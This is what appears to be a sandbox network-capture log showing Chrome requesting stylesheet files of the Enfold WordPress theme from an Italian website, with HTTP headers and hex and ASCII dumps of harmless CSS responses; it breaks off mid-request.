                                                                                                                                              2025-01-03 16:32:53 UTC2178INData Raw: 0a 2f 2a 73 69 74 65 20 70 72 65 6c 6f 61 64 65 72 3a 20 68 74 74 70 3a 2f 2f 70 72 6f 6a 65 63 74 73 2e 6c 75 6b 65 68 61 61 73 2e 6d 65 2f 63 73 73 2d 6c 6f 61 64 65 72 73 2f 20 2a 2f 0a 2e 61 76 2d 73 69 74 65 6c 6f 61 64 65 72 2d 77 72 61 70 7b 0a 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0a 74 6f 70 3a 30 3b 0a 6c 65 66 74 3a 30 3b 0a 72 69 67 68 74 3a 30 3b 0a 62 6f 74 74 6f 6d 3a 30 3b 0a 77 69 64 74 68 3a 31 30 30 25 3b 0a 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 7a 2d 69 6e 64 65 78 3a 20 31 30 30 30 30 30 30 3b 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 0a 7d 0a 68 74 6d 6c 2e 61 76 2d 70 72 65 6c 6f 61 64 65 72 2d 61 63 74 69 76 65 7b 7d 0a 68 74 6d 6c 2e 61 76 2d 70 72 65 6c 6f 61 64 65
                                                                                                                                              Data Ascii: /*site preloader: http://projects.lukehaas.me/css-loaders/ */.av-siteloader-wrap{position: fixed;top:0;left:0;right:0;bottom:0;width:100%;height:100%;z-index: 1000000;background: #fff;display:none;}html.av-preloader-active{}html.av-preloade


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              32192.168.2.164975189.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:53 UTC626OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/menu/menu.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:54 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:53 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 4481
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:54 UTC4481INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 53 55 42 4d 45 4e 55 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================SUBMENU=============================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              33192.168.2.164975089.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:53 UTC642OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/notification/notification.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:54 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:53 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 2938
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:54 UTC2938INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 4d 65 73 73 61 67 65 20 42 6f 78 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Message Box=========================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              34192.168.2.164975389.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:53 UTC632OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/numbers/numbers.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:54 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:53 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 2730
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:54 UTC2730INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 41 6e 69 6d 61 74 65 64 20 4e 75 6d 62 65 72 73 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Animated Numbers====================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              35192.168.2.164975289.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:53 UTC636OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/portfolio/portfolio.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:54 UTC293INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:54 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 10267
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:54 UTC10267INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 50 6f 72 74 66 6f 6c 69 6f 2f 50 6f 73 74 20 47 72 69 64 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Portfolio/Post Grid=================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              36192.168.2.164975589.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:54 UTC640OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/progressbar/progressbar.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:54 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:54 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 7718
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:54 UTC7718INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 50 72 6f 67 72 65 73 73 20 42 61 72 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Progress Bar========================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              37192.168.2.164975689.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:54 UTC634OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/promobox/promobox.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:54 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:54 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 1294
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:54 UTC1294INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 50 72 6f 6d 6f 20 42 6f 78 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Promo Box===========================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              38192.168.2.164975889.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:54 UTC630OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/search/search.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:55 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:54 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 5194
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:55 UTC5194INData Raw: 23 74 6f 70 20 2e 61 76 69 61 5f 73 65 61 72 63 68 5f 65 6c 65 6d 65 6e 74 20 66 6f 72 6d 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 7d 0a 23 74 6f 70 20 2e 61 76 69 61 5f 73 65 61 72 63 68 5f 65 6c 65 6d 65 6e 74 20 66 6f 72 6d 20 64 69 76 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 7d 0a 0a 2f 2a 20 73 65 61 72 63 68 20 66 6f 72 6d 20 77 72 61 70 70 65 72 20 2a 2f 0a 2e 61 76 5f 73 65 61 72 63 68 66 6f 72 6d 5f 77 72 61 70 70 65 72 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 70 78 3b
                                                                                                                                              Data Ascii: #top .avia_search_element form{ position: relative; overflow: hidden; clear: both;}#top .avia_search_element form div{ position: relative; overflow: hidden;}/* search form wrapper */.av_searchform_wrapper { border-width: 1px;


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              39192.168.2.164975989.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:54 UTC656OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_accordion/slideshow_accordion.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:55 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:55 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 2383
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:55 UTC2383INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 41 56 49 41 43 43 4f 52 44 49 4f 4e 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================AVIACCORDION========================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              40192.168.2.164976189.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:54 UTC664OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_feature_image/slideshow_feature_image.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
